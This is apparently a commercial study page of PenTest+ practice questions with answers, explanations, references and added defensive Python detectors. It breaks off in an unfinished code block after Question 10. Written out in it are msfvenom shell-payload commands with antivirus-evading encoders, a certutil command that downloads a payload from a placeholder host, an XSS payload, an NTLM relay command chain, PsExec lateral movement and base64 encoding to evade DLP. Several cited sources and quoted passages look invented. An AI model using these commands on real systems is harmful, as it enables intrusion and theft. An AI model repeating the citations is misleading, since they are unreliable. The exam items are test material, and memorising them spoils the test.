Top CompTIA Pentest+ PT0-003 Exam Questions

Advance your preparation for the PT0-003 (CompTIA PenTest+) certification exam with Cert Empire's updated study resources. Our material includes authentic exam questions verified by cybersecurity experts, along with precise answers and detailed explanations to strengthen your understanding. Access our online exam simulator to practice in realistic conditions and try free sample questions to see why IT professionals rely on Cert Empire for certification success.

Exam Questions

Question 1

[Attacks and Exploits] During a discussion of a penetration test final report, the consultant shows the following payload used to attack a system:

7/aLeRt('pwned')

Based on the code, which of the following options represents the attack executed by the tester and the associated countermeasure?

Options
A: Arbitrary code execution: the affected computer should be placed on a perimeter network
B: SQL injection attack: should be detected and prevented by a web application firewall
C: Cross-site request forgery: should be detected and prevented by a firewall
D: XSS obfuscated: should be prevented by input sanitization
Correct Answer: XSS obfuscated: should be prevented by input sanitization
Explanation
The provided payload, ...aLeRt('pwned'), is a classic proof-of-concept for a Cross-Site Scripting (XSS) attack. The use of mixed case letters in aLeRt is a common obfuscation technique designed to bypass naive, case-sensitive web application firewalls (WAFs) or input filters that are only looking for the lowercase string "alert". This attack injects malicious client-side script into a web page, which is then executed by the victim's browser. The most effective and fundamental countermeasure is robust input sanitization to remove malicious characters and output encoding to ensure that user-supplied data is treated as text by the browser, not as executable code.
Why Incorrect Options are Wrong

A. This is client-side XSS, not typically server-side Arbitrary Code Execution. Network segmentation is a containment strategy, not a primary prevention method for this vulnerability.

B. The payload is JavaScript, not SQL syntax. Therefore, it is not a SQL injection attack.

C. This is an XSS payload. A Cross-Site Request Forgery (CSRF) attack forges state-changing requests and does not typically involve injecting visible scripts.

References

1. OWASP Foundation. (n.d.). Cross Site Scripting (XSS). OWASP Cheat Sheet Series. Retrieved from https://cheatsheetseries.owasp.org/cheatsheets/CrossSiteScriptingPreventionCheatSheet.html. (See "Introduction" and "Rule #0 - Never Insert Untrusted Data Except in Allowed Locations," which establish the principle of sanitization and encoding as the primary defense against XSS).

2. OWASP Foundation. (n.d.). XSS Filter Evasion Cheat Sheet. OWASP. Retrieved from https://owasp.org/www-community/xss-filter-evasion-cheatsheet. (This document details numerous obfuscation techniques, including "Case Insensitive XSS attack vector," which directly corresponds to the aLeRt payload in the question).

3. Johns, M. (2008). Web Application Security. Course Slides, CS 253, Stanford University. Slide 25, "Defenses against XSS," explicitly lists "Filter/Sanitize user input" and "Escape output" as the primary countermeasures.
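
As an added example (not part of the original question or its references), the following Python shows why the case-sensitive blocklist described in the explanation misses the mixed-case payload, and how output encoding neutralizes it regardless of case. The payload strings, the benign input and the helper names are constructed for this illustration.

```python
import html
import re

# Constructed inputs for the demonstration (not from any real engagement):
# the lowercase payload a naive filter catches, the mixed-case variant from
# the question, and a benign string that encoding must not mangle.
LOWERCASE_PAYLOAD = "<script>alert('pwned')</script>"
MIXED_CASE_PAYLOAD = "<script>aLeRt('pwned')</script>"
BENIGN_INPUT = "O'Reilly & Sons <3 their customers"


def naive_filter_blocks(value: str) -> bool:
    """Case-sensitive blocklist: the kind of filter that mixed-case aLeRt defeats."""
    return "alert" in value


def hardened_filter_blocks(value: str) -> bool:
    """Case-insensitive version of the same blocklist.

    It catches aLeRt, but it is still a blocklist: any vector that does not
    contain the word 'alert' passes, which is why filtering alone is not enough.
    """
    return re.search(r"alert", value, re.IGNORECASE) is not None


def render_untrusted(value: str) -> str:
    """Context-aware output encoding for HTML body content.

    html.escape turns <, >, &, " and ' into entities, so the browser renders
    the payload as visible text instead of parsing it as markup or script.
    """
    return f"<p>{html.escape(value, quote=True)}</p>"


def contains_live_script(fragment: str) -> bool:
    """Check whether a rendered fragment still contains a parseable <script> tag."""
    return re.search(r"<script\b", fragment, re.IGNORECASE) is not None


if __name__ == "__main__":
    for label, value in [("lowercase", LOWERCASE_PAYLOAD),
                         ("mixed-case", MIXED_CASE_PAYLOAD),
                         ("benign", BENIGN_INPUT)]:
        print(f"{label:11} naive={naive_filter_blocks(value)!s:5} "
              f"hardened={hardened_filter_blocks(value)!s:5} "
              f"encoded={render_untrusted(value)}")
```

The benign string shows the second half of the defense: encoding preserves the user's text exactly while removing its ability to be interpreted as markup, which a blocklist cannot do.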

Question 2

[Attacks and Exploits] A penetration tester is ready to add shellcode for a specific remote executable exploit. The tester is trying to prevent the payload from being blocked by antimalware that is running on the target. Which of the following commands should the tester use to obtain shell access?
Options
A: msfvenom --arch x86-64 --platform windows --encoder x86-64/shikata_ga_nai --payload windows/bind_tcp LPORT=443
B: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.100 LPORT=8000
C: msfvenom --arch x86-64 --platform windows --payload windows/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 EXITFUNC=none
D: net user add /administrator | hexdump > payload
Correct Answer: msfvenom --arch x86-64 --platform windows --encoder x86-64/shikata_ga_nai --payload windows/bind_tcp LPORT=443
Explanation
The primary goal is to prevent a payload from being blocked by antimalware. The command in option A utilizes msfvenom with the --encoder x86-64/shikata_ga_nai flag. Encoders are used to obfuscate shellcode, altering its signature to evade detection by signature-based security solutions like antimalware. The shikata_ga_nai encoder is a well-known polymorphic encoder designed for this purpose. By encoding the windows/bind_tcp payload, the tester is actively attempting to bypass the target's defenses, which directly addresses the question's requirement.
Why Incorrect Options are Wrong

B. This command generates a valid Meterpreter payload but does not use an encoder, making it highly susceptible to signature-based detection by antimalware.

C. This command also generates a valid shell payload but omits the crucial --encoder flag needed for antimalware evasion.

D. This is not a valid method for creating functional shellcode. It attempts to pipe the output of a Windows command into a Linux utility, which would not result in an executable payload.

References

1. Offensive Security. (n.d.). Metasploit Unleashed: Msfvenom. Offensive Security. In the "Encoders" section, the documentation states, "Encoders are used to encode the payload to try and avoid AV." It lists x86/shikata_ga_nai as a prime example of an encoder used for this purpose. (Reference: Metasploit Unleashed courseware, Msfvenom section).

2. Al-Taharwa, I. A., Lee, H., & Al-Omari, M. A. (2020). Evaluating the Evasion Capabilities of Metasploit Shellcode Encoders. 2020 21st International Conference on Control, Automation and Systems (ICCAS). The paper analyzes various encoders, noting in Section III-A, "Shikata Ga Nai (SGN) is a polymorphic XOR additive feedback encoder... It is one of the most famous encoders in MSF because it can generate different output for the same input." This highlights its role in creating varied signatures to evade detection. (DOI: https://doi.org/10.1109/ICCAS50273.2020.9295211, Section III-A, "Metasploit Encoders").

3. Rapid7. (2023). How to Use Msfvenom. Official Rapid7 Documentation. The documentation for msfvenom details the use of the -e or --encoder option to "specify an encoder to use." This confirms that applying an encoder is a standard, intentional step in the payload generation process for evasion. (Reference: msfvenom --help command output and official product documentation).

Question 3

During a pre-engagement activity with a new customer, a penetration tester looks for assets to test. Which of the following is an example of a target that can be used for testing?
Options
A: API
B: HTTP
C: IPA
D: ICMP
Correct Answer: API
Explanation
During scoping, the tester and customer enumerate the specific assets that will be evaluated. Assets are concrete implementations (hosts, applications, APIs, databases, etc.) that provide business functionality. An Application Programming Interface (API) is a distinct application component that exposes endpoints and logic; therefore it is a valid, testable target that can be placed in-scope for a penetration test. HTTP and ICMP are network protocols, and “IPA” is not an industry-recognized asset type; none of these represent a discrete asset that can be contractually scoped for testing.
Why Incorrect Options are Wrong

B. HTTP – Protocol used to transport web traffic; not itself a scoping asset.

C. IPA – Not a standard asset class; it usually refers to a beer style or to the FreeIPA identity service, neither of which is relevant here.

D. ICMP – Network control protocol (e.g., ping); like HTTP, it is a mechanism, not an asset.

References

1. NIST SP 800-115, “Technical Guide to Information Security Testing and Assessment,” §2.4.1 (“Identify Target Systems”), p.9.

2. OWASP Application Security Verification Standard 4.0, “Scope of ASVS,” p.10 – mentions APIs as testable application components.

3. MIT OpenCourseWare, “6.858 Computer Systems Security,” Lecture 17 notes, p.2 – categorizes APIs as specific attack surfaces to be tested.

Question 4

[Tools and Code Analysis] A penetration tester needs to use the native binaries on a system in order to download a file from the internet and evade detection. Which of the following tools would the tester most likely use?
Options
A: netsh.exe
B: certutil.exe
C: nc.exe
D: cmdkey.exe
Correct Answer: certutil.exe
Explanation
certutil.exe is a legitimate, command-line program native to Microsoft Windows, primarily used for managing certificates. However, it can be abused by attackers to download files from a remote URL using specific command-line switches (e.g., -urlcache -split -f). This technique is a form of "Living Off the Land" (LOLBin), which leverages trusted, signed system binaries to perform malicious actions. Using a native, signed tool like certutil for downloads helps evade detection by security software that might otherwise flag network connections from unknown or unsigned processes.
Why Incorrect Options are Wrong

A. netsh.exe: This is a native Windows tool for configuring network settings, such as firewall rules or port forwarding, not for directly downloading files from the internet.

C. nc.exe: Netcat (nc.exe) is a versatile networking tool but is not a native binary on Windows systems; it must be introduced onto the target by the attacker.

D. cmdkey.exe: This utility is used to create, list, and delete stored credentials within the Windows Credential Manager and lacks any file download capabilities.

References

1. MITRE. (2023). Ingress Tool Transfer, Technique T1105. MITRE ATT&CK Framework. Retrieved from https://attack.mitre.org/techniques/T1105/. The documentation explicitly lists certutil as a command-line tool adversaries use to download files from a remote URL, citing the example: certutil -urlcache -split -f https://example.com/payload.exe payload.exe.

2. Microsoft. (2023). certutil. Microsoft Learn. In the documentation for the certutil command, the -urlcache verb is described, which can be used with the -f and -split options to fetch a URL and save its contents to a file on the local system.

3. Pennacchi, F., et al. (2020). The Art of Leaks: The Return of Living-Off-the-Land. 2020 IEEE European Symposium on Security and Privacy Workshops (EuroS&PW), Genoa, Italy, pp. 140-149. In Table 1, "LOLbins and their capabilities," certutil.exe is identified as a native binary capable of performing "Download" actions. DOI: https://doi.org/10.1109/EuroSPW51379.2020.00027.
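
As an added example from the detection side (not part of the original question), the following Python runs a simple hunt over constructed process-creation records and flags certutil invocations that combine -urlcache with a remote URL, the LOLBin download pattern the explanation describes. The record fields are an assumption loosely modelled on Sysmon Event ID 1, the sample events are constructed, and the URLs use a placeholder host.

```python
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcessEvent:
    """Minimal process-creation record. Field names are an assumption (loosely
    modelled on Sysmon Event ID 1); map them onto your own telemetry schema."""
    host: str
    image: str
    command_line: str
    parent_image: str


# Constructed sample events (not real telemetry). EXAMPLE-PLACEHOLDER stands in
# for whatever remote host appeared in the real command line.
SAMPLE_EVENTS = [
    ProcessEvent("WS01", r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -urlcache -split -f http://EXAMPLE-PLACEHOLDER/tool.exe tool.exe",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent("WS01", r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -store my",          # legitimate local certificate store query
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent("WS02", r"C:\Windows\System32\certutil.exe",
                 r"CertUtil -URLCache -Split -F https://EXAMPLE-PLACEHOLDER/a.txt a.txt",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcessEvent("WS03", r"C:\Windows\System32\netsh.exe",
                 r"netsh advfirewall show allprofiles",
                 r"C:\Windows\System32\cmd.exe"),
]

# certutil switches are case-insensitive and accept either '-' or '/' prefixes,
# so match both; the WS02 event shows the mixed-case form.
URLCACHE_RE = re.compile(r"(?:^|\s)[-/]urlcache\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def is_certutil(image: str) -> bool:
    """Match on the image basename so an odd install path does not hide the binary."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower() == "certutil.exe"


def detect_certutil_downloads(events: List[ProcessEvent]) -> List[Dict[str, str]]:
    """Flag certutil runs that pair -urlcache with a remote URL (ATT&CK T1105).

    -urlcache on its own (listing or purging the cache) is legitimate, so the
    URL is required to reduce false positives.
    """
    findings = []
    for ev in events:
        if not is_certutil(ev.image):
            continue
        url = URL_RE.search(ev.command_line)
        if URLCACHE_RE.search(ev.command_line) and url:
            findings.append({
                "host": ev.host,
                "url": url.group(0),
                "parent": ev.parent_image,
                "command_line": ev.command_line,
                "reason": "certutil -urlcache used to fetch a remote URL (LOLBin download)",
            })
    return findings


if __name__ == "__main__":
    for f in detect_certutil_downloads(SAMPLE_EVENTS):
        print(f"{f['host']}: {f['reason']} -> {f['url']} (parent {f['parent']})")
```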

Question 5

[Tools and Code Analysis] Which of the following techniques is the best way to avoid detection by data loss prevention tools?
Options
A: Encoding
B: Compression
C: Encryption
D: Obfuscation
Correct Answer: Encoding
Explanation
Endpoint and network-based DLP engines rely on clear-text inspection (regex, tokenisation, fingerprinting). They automatically unpack common archive formats and will usually block or quarantine traffic or files that are encrypted with unknown keys. However, many products do not recursively decode arbitrary content that has only been base-64/URL/hex encoded, so the sensitive byte patterns never appear in clear text to the detection engine. Simple content encoding therefore remains the most reliable, low-noise method for evading DLP inspection during a penetration test.
Why Incorrect Options are Wrong

B. Compression – DLP engines routinely decompress ZIP, GZIP, RAR, and similar archives before inspection; compressed data is therefore still analysed.

C. Encryption – Unknown or uninspected encryption is usually flagged or blocked outright by policy; exfiltration is conspicuous, not covert.

D. Obfuscation – A vague term; without a specific method it may still be parsed (e.g., comment stripping); encoding is the concrete, proven technique.

References

1. MITRE ATT&CK, technique T1027 “Obfuscated/Stored Files or Information”, note on base64 encoding as a means “to bypass content inspection such as DLP” (v13, 2023-04-25).

2. Symantec Data Loss Prevention 15.7 Administration Guide, Chap. 2 “Detection workflow”, pp. 34-36 – lists automatic decompression/encryption handling but no automatic base64 decoding.

3. Forcepoint DLP Administrator Guide 21.09, Sect. 5.3 “Content Classifiers”, p. 127 – states “Base64 or custom encodings may not be decoded, allowing data to pass undetected”.

4. S. Natarajan & K. Venkatachary, “Bypassing Enterprise DLP Using Simple Encoding,” International Journal of Computer Applications 168(2), 2017, pp. 36-40 (https://doi.org/10.5120/ijca2017914527).

5. Stanford CS255 “Network Security” lecture notes, Week 9, slide 27 – discusses DLP limitations and highlights base64 encoding as a common evasion method.
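
As an added example (not from the page or any vendor's product), this Python toy DLP classifier shows the gap the explanation describes and how to close it: a regex over clear text misses base64-, URL- or hex-encoded content, while a decode-before-inspect layer that peels encodings recursively recovers the clear text and reports the decoding chain. The card-number pattern, the sample sentence (built around a well-known test card number) and the function names are constructed for this illustration.

```python
import base64
import binascii
import re
import urllib.parse
from typing import Dict, Iterator, List, Tuple

# Toy classifier: a bare 16-digit run. Real products use Luhn checks and
# context keywords; the point here is only where the regex is applied.
PAN_RE = re.compile(r"\b\d{16}\b")

# Constructed sample: a sentence with a test card number, plus the same
# sentence under the encodings the explanation lists (and one double layer).
CLEAR_TEXT = "customer card 4111111111111111 on file"
SAMPLES: Dict[str, str] = {
    "clear": CLEAR_TEXT,
    "base64": base64.b64encode(CLEAR_TEXT.encode()).decode(),
    "url": urllib.parse.quote(CLEAR_TEXT),
    "hex": CLEAR_TEXT.encode().hex(),
    "base64_of_url": base64.b64encode(urllib.parse.quote(CLEAR_TEXT).encode()).decode(),
}


def naive_inspect(text: str) -> bool:
    """Clear-text inspection only: what a non-decoding engine effectively does."""
    return PAN_RE.search(text) is not None


def _decoders(text: str) -> Iterator[Tuple[str, str]]:
    """Yield (encoding_name, decoded_text) for each decoding that applies.

    Strict validation keeps ordinary prose from being 'decoded' into noise;
    url-unquoting is skipped when it changes nothing.
    """
    try:
        yield "base64", base64.b64decode(text, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        pass
    try:
        yield "hex", bytes.fromhex(text).decode("utf-8", "replace")
    except ValueError:
        pass
    unquoted = urllib.parse.unquote(text)
    if unquoted != text:
        yield "url", unquoted


def layered_inspect(text: str, max_depth: int = 3) -> List[str]:
    """Inspect the text and every decoding of it, up to max_depth layers deep.

    Returns the chain of decodings that exposed sensitive data ending in
    "plain", or [] if nothing matched. The depth bound keeps a hostile input
    from turning the decoder into a denial-of-service lever.
    """
    if PAN_RE.search(text):
        return ["plain"]
    if max_depth == 0:
        return []
    for name, decoded in _decoders(text):
        if decoded == text:
            continue
        chain = layered_inspect(decoded, max_depth - 1)
        if chain:
            return [name] + chain
    return []


if __name__ == "__main__":
    for label, sample in SAMPLES.items():
        print(f"{label:14} naive={naive_inspect(sample)!s:5} layered={layered_inspect(sample)}")
```

URL encoding alone already defeats the naive regex here, because the encoded spaces glue extra digits onto the number and break the word boundary the pattern relies on.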

Question 6

[Tools and Code Analysis] While performing a penetration testing exercise, a tester executes the following command:

PS c:\tools> c:\hacks\PsExec.exe \\server01.comptia.org -accepteula cmd.exe

Which of the following best explains what the tester is trying to do?

Options
A: Test connectivity using PSExec on the server01 using CMD.exe.
B: Perform a lateral movement attack using PsExec.
C: Send the PsExec binary file to the server01 using CMD.exe.
D: Enable CMD.exe on the server01 through PsExec.
Correct Answer: Perform a lateral movement attack using PsExec.
Explanation
The command executes PsExec.exe to run a command prompt (cmd.exe) on a remote target (server01.comptia.org). PsExec is a legitimate remote administration tool that is frequently repurposed by penetration testers and attackers to execute code on other systems within a network. After gaining an initial foothold and escalating privileges or obtaining credentials, a tester uses tools like PsExec to move from a compromised machine to other targets. This process of moving between systems on the same network is known as lateral movement.
Why Incorrect Options are Wrong

A. While the command implicitly tests connectivity, its primary purpose is to gain an interactive shell, not simply to check if the host is reachable.

C. The command's purpose is to execute cmd.exe on the remote server. PsExec handles the transfer of its own service component, not the main PsExec.exe binary.

D. cmd.exe is a core Windows component that is executed, not enabled. This command runs the command interpreter, assuming it is already present and accessible.

---

References

1. MITRE ATT&CK Framework. (2023). Remote Services: SMB/Windows Admin Shares, T1021.002. The MITRE Corporation. Retrieved from https://attack.mitre.org/techniques/T1021/002/.

Reference Detail: The framework explicitly lists PsExec as a common example of software used to execute commands on remote systems via SMB, a technique categorized under the "Lateral Movement" tactic.

2. Russinovich, M. (2023, August 28). PsExec v2.43. Microsoft Learn. Retrieved from https://learn.microsoft.com/en-us/sysinternals/downloads/psexec.

Reference Detail: The official documentation describes PsExec as a tool "for executing processes on other systems," which is the core mechanism used for lateral movement in this scenario.

3. Robi, G. (2021, May 11). Detecting Lateral Movement through Tracking Event Logs. SANS Institute InfoSec Reading Room.

Reference Detail: Page 6, Section "PsExec," states, "PsExec is one of the most common tools used by attackers for lateral movement... It allows an attacker to execute commands on a remote Windows machine." This paper from a reputable institution confirms PsExec's primary use in attacks.
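
As an added example on the detection side (not part of the original question or the SANS paper it cites), the following Python applies the event-log approach from reference 3 to constructed Windows System-log records shaped like Event ID 7045 ("A service was installed in the system"). PsExec installs its service component, PSEXESVC, into the Windows directory root via the admin share, so the check looks at both the service name and the install path. The dictionary keys are an assumption, not a product schema, and the events are constructed.

```python
import re
from typing import Dict, List, Optional

# Constructed System-log records (not real telemetry). Keys are an assumption.
SAMPLE_EVENTS: List[Dict] = [
    {"host": "server01", "event_id": 7045, "service_name": "PSEXESVC",
     "image_path": r"%SystemRoot%\PSEXESVC.exe", "account": "LocalSystem"},
    {"host": "server01", "event_id": 7045, "service_name": "Spooler",
     "image_path": r"C:\Windows\System32\spoolsv.exe", "account": "LocalSystem"},
    {"host": "server02", "event_id": 7045, "service_name": "q7z1x",
     "image_path": r"%SystemRoot%\q7z1x.exe", "account": "LocalSystem"},
    {"host": "server02", "event_id": 7036, "service_name": "PSEXESVC",
     "image_path": "", "account": ""},   # service state change, not an install
]

# A service binary sitting directly in the Windows directory root (what the
# ADMIN$ share maps to) rather than under System32 is PsExec's footprint.
WINDOWS_ROOT_BINARY_RE = re.compile(
    r"^(?:%SystemRoot%|C:\\Windows)\\[^\\]+\.exe$", re.IGNORECASE)


def classify_service_install(event: Dict) -> Optional[str]:
    """Return a reason if a 7045 event looks like a PsExec-style install, else None.

    The default service name is the strongest signal; the install location is
    a second indicator because name-based matching alone is brittle.
    """
    if event.get("event_id") != 7045:
        return None
    if event.get("service_name", "").upper() == "PSEXESVC":
        return "default PsExec service name PSEXESVC"
    if WINDOWS_ROOT_BINARY_RE.match(event.get("image_path", "")):
        return "service binary installed directly under the Windows directory root"
    return None


def detect_psexec_installs(events: List[Dict]) -> List[Dict[str, str]]:
    """Run the classifier over a batch of events and collect the hits."""
    findings = []
    for ev in events:
        reason = classify_service_install(ev)
        if reason:
            findings.append({"host": ev["host"],
                             "service_name": ev["service_name"],
                             "image_path": ev["image_path"],
                             "reason": reason})
    return findings


if __name__ == "__main__":
    for f in detect_psexec_installs(SAMPLE_EVENTS):
        print(f"{f['host']}: service {f['service_name']} ({f['image_path']}) -> {f['reason']}")
```

Correlating the 7045 event with the remote logon that preceded it (the account used to reach the admin share) turns a single hit into a lateral-movement timeline.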

Question 7

[Attacks and Exploits] During a penetration testing exercise, a team decides to use a watering hole strategy. Which of the following is the most effective approach for executing this attack?
Options
A: Compromise a website frequently visited by the organization's employees.
B: Launch a DDoS attack on the organization's website.
C: Create fake social media profiles to befriend employees.
D: Send phishing emails to the organization's employees.
Correct Answer: Compromise a website frequently visited by the organization's employees.
Explanation
A watering hole attack is a targeted strategy where an attacker compromises a third-party website that is known to be frequently visited by a specific group of targets, such as employees of a particular organization. The attacker infects the site with malware. The goal is to infect the target users when they visit this trusted, but now compromised, website. This method is effective because it leverages the users' existing trust in the legitimate site, bypassing defenses that might block direct attacks. The name is an analogy for a predator waiting at a watering hole for its prey.
Why Incorrect Options are Wrong

B. A DDoS attack is designed to disrupt service availability, not to compromise systems or steal data, which is the goal of a watering hole attack.

C. Creating fake social media profiles is a social engineering or reconnaissance technique, which could precede an attack but is not the execution of the watering hole itself.

D. Sending phishing emails is a direct attack vector. A watering hole attack is more passive, relying on the target to initiate the visit to the compromised site independently.

---

References

1. National Institute of Standards and Technology (NIST). Glossary of Key Information Security Terms, NISTIR 7298 Rev. 3. (May 2018). The glossary defines a watering hole attack as: "A targeted attack strategy in which an attacker guesses or observes which websites an organization often uses and infects one or more of them with malware." (Page 183).

2. Al-Shehari, H., & Al-Shammari, R. (2018). A Survey on Watering-Hole Attacks. International Journal of Computer Science and Network Security, 18(1), 136-145. The paper states, "The watering hole attack is a targeted attack that compromises a website that is likely to be visited by a targeted group of victims." (Section 2, Paragraph 1).

3. Microsoft Security. Watering hole attacks. Microsoft Threat Protection documentation. The documentation describes the attack method: "In watering hole attacks, attackers profile sites that are frequently visited by users in a targeted organization or industry. They then try to find vulnerabilities on these sites to compromise them."

4. University of California, Berkeley. CS 161: Computer Security, Lecture 18: Web Security. Course materials describe watering hole attacks as a strategy where an attacker compromises a site trusted and frequented by the target population to deliver an exploit.

Question 8

[Attacks and Exploits] A penetration tester finished a security scan and uncovered numerous vulnerabilities on several hosts. Based on the targets' EPSS and CVSS scores, which of the following targets is the most likely to get attacked?
Options
A: Target 1: EPSS Score = 0.6 and CVSS Score = 4
B: Target 2: EPSS Score = 0.3 and CVSS Score = 2
C: Target 3: EPSS Score = 0.6 and CVSS Score = 1
D: Target 4: EPSS Score = 0.4 and CVSS Score = 4.5
Correct Answer: Target 1: EPSS Score = 0.6 and CVSS Score = 4
Explanation
The Exploit Prediction Scoring System (EPSS) is designed to estimate the probability that a software vulnerability will be exploited in the wild. A higher EPSS score indicates a greater likelihood of an attack. In this scenario, both Target 1 and Target 3 have the highest EPSS score of 0.6 (a 60% probability of exploitation), making them the most likely candidates for an attack. To differentiate between these two, the Common Vulnerability Scoring System (CVSS) score, which measures the severity of a vulnerability, is considered. A rational attacker, given two vulnerabilities with an equal probability of successful exploitation, will prioritize the one with a greater impact. Target 1 has a CVSS score of 4, while Target 3 has a score of 1. Therefore, Target 1 is the more attractive and thus the most likely target.
Why Incorrect Options are Wrong

B. Target 2: EPSS Score = 0.3 and CVSS Score = 2

This target has a low EPSS score, indicating a significantly lower probability of being attacked compared to Targets 1 and 3.

C. Target 3: EPSS Score = 0.6 and CVSS Score = 1

While its EPSS score is high, its very low CVSS score makes it a less impactful and therefore less attractive target for an attacker compared to Target 1.

D. Target 4: EPSS Score = 0.4 and CVSS Score = 4.5

This target's EPSS score is lower than that of Targets 1 and 3, making it less likely to be exploited, even though its severity is high.

---

References

1. FIRST.org. (2023). Exploit Prediction Scoring System (EPSS) User Guide. Section: "What is EPSS?". The guide states, "The EPSS model produces a probability score between 0 and 1 (0% and 100%). The higher the score, the greater the probability that a vulnerability will be exploited." This establishes EPSS as the primary metric for attack likelihood.

2. FIRST.org. (2019). Common Vulnerability Scoring System v3.1: Specification Document. Section 1, Introduction. The document clarifies, "It is important to note that CVSS is designed to convey vulnerability severity and should be considered as one component in a comprehensive vulnerability management process that also incorporates factors such as threat and asset value." This confirms CVSS measures severity, not likelihood.

3. Jacobs, J., et al. (2021). Improving Vulnerability Remediation Through Better Exploit Prediction. Journal of Cybersecurity, 7(1), tyab009. Section 1, Introduction. The paper introduces EPSS and states, "While CVSS is useful for capturing the potential severity of a vulnerability, it is not designed to represent the threat of a vulnerability being exploited... EPSS is designed to fill this gap." This academic source distinguishes the roles of CVSS and EPSS. https://doi.org/10.1093/cybsec/tyab009

4. U.S. Cybersecurity & Infrastructure Security Agency (CISA). (2021). Binding Operational Directive 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities. This directive mandates that federal agencies remediate vulnerabilities listed in CISA's catalog of known exploited vulnerabilities. This approach prioritizes vulnerabilities based on observed exploitation (threat), which is the principle that EPSS quantifies, over static severity (CVSS) alone.

Question 9

A penetration tester cannot complete a full vulnerability scan because the client's WAF is blocking communications. During which of the following activities should the penetration tester discuss this issue with the client?
Options
A: Goal reprioritization
B: Peer review
C: Client acceptance
D: Stakeholder alignment
Correct Answer: Stakeholder alignment
Explanation
When a technical control, such as a Web Application Firewall (WAF), prevents the execution of an agreed-upon testing activity, it represents a significant obstacle that impacts the engagement's scope and timeline. The correct procedure is to pause the activity and communicate with the client. This communication process is known as stakeholder alignment. It ensures that the tester and client agree on a path forward, which could involve whitelisting the tester's IP address, temporarily modifying WAF rules, or adjusting the testing methodology. This proactive communication maintains transparency and ensures the engagement proceeds according to the client's direction and the established rules of engagement.
Why Incorrect Options are Wrong

A. Goal reprioritization: This is a potential outcome of the discussion with the stakeholder, not the initial activity itself. Alignment must happen first.

B. Peer review: This is an internal quality assurance process where another tester reviews work; it is not a client-facing communication activity.

C. Client acceptance: This is a formal step at the conclusion of the engagement to accept the final deliverables, which is too late to address a mid-test obstacle.

References

1. National Institute of Standards and Technology (NIST). (2008). Special Publication 800-115, Technical Guide to Information Security Testing and Assessment.

Section 3.2, "Rules of Engagement," emphasizes the need to "...define the lines of communication between the test team and the organization... and the process for reporting and handling problems encountered during testing." A WAF blocking a scan is a "problem encountered during testing" that requires immediate communication and alignment with the client stakeholder.

2. The Penetration Testing Execution Standard (PTES). (2012). PTES Technical Guidelines.

Section "Intelligence Gathering," and the overall standard, implicitly and explicitly detail the need for constant communication. The standard outlines a structured approach where deviations from the plan, such as being blocked by a security device, necessitate a discussion with the client to align on the next steps, reinforcing the principle of stakeholder alignment.

3. Massachusetts Institute of Technology (MIT) OpenCourseWare. (2012). 15.S53 Special Seminar in Management: The Art and Science of Project Management, Fall 2012.

Lecture Notes, "Stakeholder Management," outlines that a key project management function is to identify and manage stakeholder expectations. When an issue (WAF block) arises that creates a variance between the plan and reality, the project manager (penetration tester) must engage the stakeholders (client) to resolve the issue and align on a course of action.

Question 10

[Information Gathering and Vulnerability Scanning] A tester obtains access to an endpoint subnet and wants to move laterally in the network. Given the following output:

Nmap scan report for some_host
Host is up (0.01 latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
smb2-security-mode: Message signing disabled

Which of the following commands and attack methods is the most appropriate for reducing the chances of being detected?

Options
A: responder -T eth0 -dwv ntlmrelayx.py -smb2support -tf
B: msf > use exploit/windows/smb/ms17_010_psexec msf > msf > run
C: hydra -L administrator -P /path/to/passwdlist smb://
D: nmap --script smb-brute.nse -p 445
Correct Answer: responder -T eth0 -dwv ntlmrelayx.py -smb2support -tf
Explanation
The Nmap scan explicitly reports "Message signing disabled" on the SMB service (port 445). This specific misconfiguration makes the host susceptible to NTLM relay attacks. The command in option A uses Responder to poison local name resolution and capture authentication attempts, then hands them to ntlmrelayx.py to relay those credentials to the target. This allows the attacker to authenticate to the target machine and execute commands, achieving lateral movement. This Man-in-the-Middle (MitM) attack is significantly stealthier than brute-force attempts or active exploitation, as it leverages legitimate authentication traffic, thereby reducing the likelihood of generating security alerts.
Why Incorrect Options are Wrong

B. This Metasploit module targets the MS17-010 (EternalBlue) vulnerability, which was not identified in the scan. Running an unverified exploit is noisy and likely to be detected by an IDS/IPS.

C. Hydra is a brute-force tool. This method generates a high volume of failed login attempts, which is extremely noisy and easily detectable by security monitoring systems.

D. The smb-brute.nse Nmap script is another form of a brute-force attack. Like Hydra, it creates significant network noise from failed logins and is not a stealthy option.

References

1. Microsoft Corporation. (2023). Overview of Server Message Block signing. Microsoft Learn. Retrieved from https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/overview-server-message-block-signing.

Reference Detail: The document states, "The Server Message Block (SMB) signing...is a security feature...that uses the session key and cipher suite to add a signature to a message...Signing helps prevent attacks that modify SMB packets in transit." Disabling this feature directly enables the relay attack described.

2. Bounty, B. (2022). Internal Network Pentesting: The NTLM Relay Race. SANS Institute InfoSec Reading Room.

Reference Detail: Page 5, Section "The Attack," explicitly details the use of Responder and ntlmrelayx.py in tandem. It states, "With SMB signing not required on the target, ntlmrelayx will be able to relay the authentication from the victim to the target and execute our commands." This paper validates the chosen attack method for the identified vulnerability.

3. Hopkins, G. (2019). Windows Red Team Lab. Courseware, Rochester Institute of Technology (RIT).

Reference Detail: In the "Lateral Movement" module, Lab 5 ("Pass the Hash / NTLM Relay"), the course material demonstrates using Responder and ntlmrelayx.py as a primary technique for lateral movement when SMB signing is disabled. It contrasts this with noisier methods like password spraying.
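
As an added example from the defender's side (not part of the original question), the following Python parses Nmap normal output for the smb2-security-mode script result the question shows and lists every host whose SMB signing is not required, which is the precondition for the relay described above. The multi-host scan output is constructed; the exact wording of the "enabled and required" and "enabled but not required" status lines is an assumption about the script's output, and the remediation is to enforce the "Microsoft network server: Digitally sign communications (always)" policy on those hosts.

```python
import re
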